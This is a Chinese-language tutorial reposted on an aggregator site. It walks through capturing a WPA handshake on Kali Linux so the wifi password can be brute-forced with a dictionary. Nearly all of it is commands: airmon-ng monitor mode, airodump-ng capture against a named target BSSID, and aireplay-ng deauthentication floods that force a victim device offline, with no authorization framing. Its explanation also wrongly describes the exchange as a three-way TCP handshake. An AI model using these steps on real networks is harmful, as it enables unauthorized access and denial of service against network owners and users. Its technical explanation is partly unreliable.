admin管理员组文章数量:1620369
KALI - 暴破wifi之抓取握手包
提示:要有外置的 支持 kali 的 usb 无线网卡,虚拟机要把vmware的usb服务和网卡启用。
1.查看网卡信息
sudo airmon-ng
或者
sudo ifconfig
2.开启监听模式
sudo airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon,可以继续用步骤1的方法查看。
3.扫描wifi
sudo airodump-ng wlan0mon
然后会自动扫描列出附近wifi
记下目标wifi的频道号(CH)和BSSID。
按 Ctrl
+C
停止扫描
4.抓取握手包
该步骤原理:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送包含hash加密的密码数据tcp包,我们的设备伪装成目标wifi窃取该数据包。窃取后即可用字典暴破WiFi密码。(因此目标wifi中至少有一个连接的设备)
开始抓包
sudo airodump-ng -c 6 --bssid 04:95:E6:C3:14:A9 -w ~/ wlan0mon
参数:
-c 指定频道号
--bssid 指定路由器bssid
-w 指定抓取的握手包存储路径
最后是指定网卡接口
可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。
迫使设备重新连接
开始抓包后,我们需要等用户连接我们伪装的wifi,才能抓到包。所以我们需要利用aireplay-ng工具,给连接到wifi的一个设备发送deauth(反认证)包,使该设备断开wifi,随后它自然会再次连接wifi。
sudo aireplay-ng -0 2 -a 04:95:E6:C3:14:A9 -c 38:01:46:8E:E5:20 wlan0mon
参数解释:
-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)
-a 指定无线路由器BSSID
-c 指定强制断开的设备
最后是指定网卡接口
出现WPA handshake时,表示抓包成功
按 Ctrl
+C
停止抓包
最后得到一个后缀为 .cap
的握手包文件再拿去暴破
版权声明:本文标题:KALI - 暴破wifi之抓取握手包 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1728817976a1175134.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论